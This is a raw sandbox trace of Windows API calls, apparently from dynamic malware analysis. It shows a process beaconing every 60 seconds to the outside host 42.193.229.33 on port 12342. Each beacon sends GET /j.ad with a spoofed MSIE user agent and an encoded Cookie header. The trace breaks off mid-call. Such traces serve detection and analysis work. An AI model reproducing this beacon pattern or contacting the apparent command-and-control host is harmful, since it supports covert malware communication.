InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0152.831] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0152.831] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0152.831] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0152.831] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0152.831] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0152.831] GetLastError () returned 0x0 [0152.831] htonl (hostlong=0x7000000) returned 0x7 [0152.831] htonl (hostlong=0x0) returned 0x0 [0152.831] htonl (hostlong=0x3000000) returned 0x3 [0152.831] htonl (hostlong=0x6000000) returned 0x6 [0152.831] htonl (hostlong=0x6000000) returned 0x6 [0152.831] GetLastError () returned 0x0 [0152.831] htonl (hostlong=0x0) returned 0x0 [0152.831] GetLastError () returned 0x0 [0152.832] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0152.832] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0154.799] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0154.799] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0154.799] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0154.799] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0154.799] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0154.799] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0154.799] Sleep (dwMilliseconds=0xea60) [0154.805] GetLastError () returned 0x2efd [0154.805] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0154.806] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0154.806] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0154.816] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0154.816] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0154.816] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0154.816] GetLastError () returned 0x0 [0154.816] htonl (hostlong=0x7000000) returned 0x7 [0154.817] htonl (hostlong=0x0) returned 0x0 [0154.817] htonl (hostlong=0x3000000) returned 0x3 [0154.817] htonl (hostlong=0x6000000) returned 0x6 [0154.817] htonl (hostlong=0x6000000) returned 0x6 [0154.817] GetLastError () returned 0x0 [0154.817] htonl (hostlong=0x0) returned 0x0 [0154.817] GetLastError () returned 0x0 [0154.817] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0154.817] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0156.816] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0156.816] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0156.816] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0156.816] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0156.816] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0156.816] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0156.816] Sleep (dwMilliseconds=0xea60) [0156.818] GetLastError () returned 0x2efd [0156.818] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0156.818] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0156.818] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0156.818] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0156.818] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0156.818] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0156.818] GetLastError () returned 0x0 [0156.818] htonl (hostlong=0x7000000) returned 0x7 [0156.818] htonl (hostlong=0x0) returned 0x0 [0156.818] htonl (hostlong=0x3000000) returned 0x3 [0156.818] htonl (hostlong=0x6000000) returned 0x6 [0156.818] htonl (hostlong=0x6000000) returned 0x6 [0156.818] GetLastError () returned 0x0 [0156.819] htonl (hostlong=0x0) returned 0x0 [0156.819] GetLastError () returned 0x0 [0156.819] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0156.819] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0158.817] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0158.817] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0158.817] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0158.817] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0158.817] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0158.817] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0158.817] Sleep (dwMilliseconds=0xea60) [0158.830] GetLastError () returned 0x2efd [0158.836] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0158.837] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0158.837] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0158.837] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0158.837] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0158.837] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0158.837] GetLastError () returned 0x0 [0158.837] htonl (hostlong=0x7000000) returned 0x7 [0158.837] htonl (hostlong=0x0) returned 0x0 [0158.837] htonl (hostlong=0x3000000) returned 0x3 [0158.837] htonl (hostlong=0x6000000) returned 0x6 [0158.837] htonl (hostlong=0x6000000) returned 0x6 [0158.837] GetLastError () returned 0x0 [0158.837] htonl (hostlong=0x0) returned 0x0 [0158.837] GetLastError () returned 0x0 [0158.837] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0158.837] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0160.809] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0160.809] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0160.809] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0160.809] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0160.809] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0160.809] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0160.809] Sleep (dwMilliseconds=0xea60) [0160.815] GetLastError () returned 0x2efd [0160.815] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0160.815] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0160.815] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0160.815] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0160.815] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0160.815] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0160.815] GetLastError () returned 0x0 [0160.816] htonl (hostlong=0x7000000) returned 0x7 [0160.816] htonl (hostlong=0x0) returned 0x0 [0160.816] htonl (hostlong=0x3000000) returned 0x3 [0160.816] htonl (hostlong=0x6000000) returned 0x6 [0160.816] htonl (hostlong=0x6000000) returned 0x6 [0160.816] GetLastError () returned 0x0 [0160.816] htonl (hostlong=0x0) returned 0x0 [0160.816] GetLastError () returned 0x0 [0160.816] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0160.816] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0162.832] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0162.832] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0162.832] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0162.832] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0162.832] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0162.832] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0162.832] Sleep (dwMilliseconds=0xea60) [0162.839] GetLastError () returned 0x2efd [0162.839] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0162.843] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0162.843] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0162.843] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0162.843] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0162.843] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0162.843] GetLastError () returned 0x0 [0162.844] htonl (hostlong=0x7000000) returned 0x7 [0162.844] htonl (hostlong=0x0) returned 0x0 [0162.844] htonl (hostlong=0x3000000) returned 0x3 [0162.844] htonl (hostlong=0x6000000) returned 0x6 [0162.844] htonl (hostlong=0x6000000) returned 0x6 [0162.844] GetLastError () returned 0x0 [0162.844] htonl (hostlong=0x0) returned 0x0 [0162.844] GetLastError () returned 0x0 [0162.844] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0162.844] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0164.880] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0164.880] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0164.880] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0164.880] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0164.880] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0164.880] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0164.880] Sleep (dwMilliseconds=0xea60) [0164.883] GetLastError () returned 0x2efd [0164.883] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0164.883] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0164.883] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0164.883] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0164.883] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0164.883] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0164.884] GetLastError () returned 0x0 [0164.884] htonl (hostlong=0x7000000) returned 0x7 [0164.884] htonl (hostlong=0x0) returned 0x0 [0164.884] htonl (hostlong=0x3000000) returned 0x3 [0164.884] htonl (hostlong=0x6000000) returned 0x6 [0164.884] htonl (hostlong=0x6000000) returned 0x6 [0164.884] GetLastError () returned 0x0 [0164.884] htonl (hostlong=0x0) returned 0x0 [0164.884] GetLastError () returned 0x0 [0164.884] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0164.884] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0166.926] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0166.927] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0166.927] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0166.927] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0166.927] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0166.927] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0166.927] Sleep (dwMilliseconds=0xea60) [0166.942] GetLastError () returned 0x2efd [0166.943] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0166.943] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0166.943] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0166.943] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0166.943] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0166.943] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0166.943] GetLastError () returned 0x0 [0166.943] htonl (hostlong=0x7000000) returned 0x7 [0166.943] htonl (hostlong=0x0) returned 0x0 [0166.944] htonl (hostlong=0x3000000) returned 0x3 [0166.944] htonl (hostlong=0x6000000) returned 0x6 [0166.944] htonl (hostlong=0x6000000) returned 0x6 [0166.944] GetLastError () returned 0x0 [0166.944] htonl (hostlong=0x0) returned 0x0 [0166.944] GetLastError () returned 0x0 [0166.944] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0166.944] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0168.945] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0168.946] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0168.946] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0168.948] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0168.949] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0168.949] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0168.950] Sleep (dwMilliseconds=0xea60) [0168.955] GetLastError () returned 0x2efd [0168.956] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0168.956] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0168.956] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0168.956] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0168.956] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0168.956] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0168.956] GetLastError () returned 0x0 [0168.957] htonl (hostlong=0x7000000) returned 0x7 [0168.957] htonl (hostlong=0x0) returned 0x0 [0168.958] htonl (hostlong=0x3000000) returned 0x3 [0168.959] htonl (hostlong=0x6000000) returned 0x6 [0168.959] htonl (hostlong=0x6000000) returned 0x6 [0168.959] GetLastError () returned 0x0 [0168.960] htonl (hostlong=0x0) returned 0x0 [0168.960] GetLastError () returned 0x0 [0168.960] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0168.960] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0170.944] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0170.944] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0170.944] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0170.944] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0170.944] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0170.944] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0170.944] Sleep (dwMilliseconds=0xea60) [0170.951] GetLastError () returned 0x2efd [0170.956] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0170.956] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0170.956] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0170.956] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0170.956] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0170.956] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0170.956] GetLastError () returned 0x0 [0170.956] htonl (hostlong=0x7000000) returned 0x7 [0170.956] htonl (hostlong=0x0) returned 0x0 [0170.956] htonl (hostlong=0x3000000) returned 0x3 [0170.956] htonl (hostlong=0x6000000) returned 0x6 [0170.956] htonl (hostlong=0x6000000) returned 0x6 [0170.956] GetLastError () returned 0x0 [0170.956] htonl (hostlong=0x0) returned 0x0 [0170.956] GetLastError () returned 0x0 [0170.957] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0170.957] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0172.941] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0172.941] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0172.941] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, 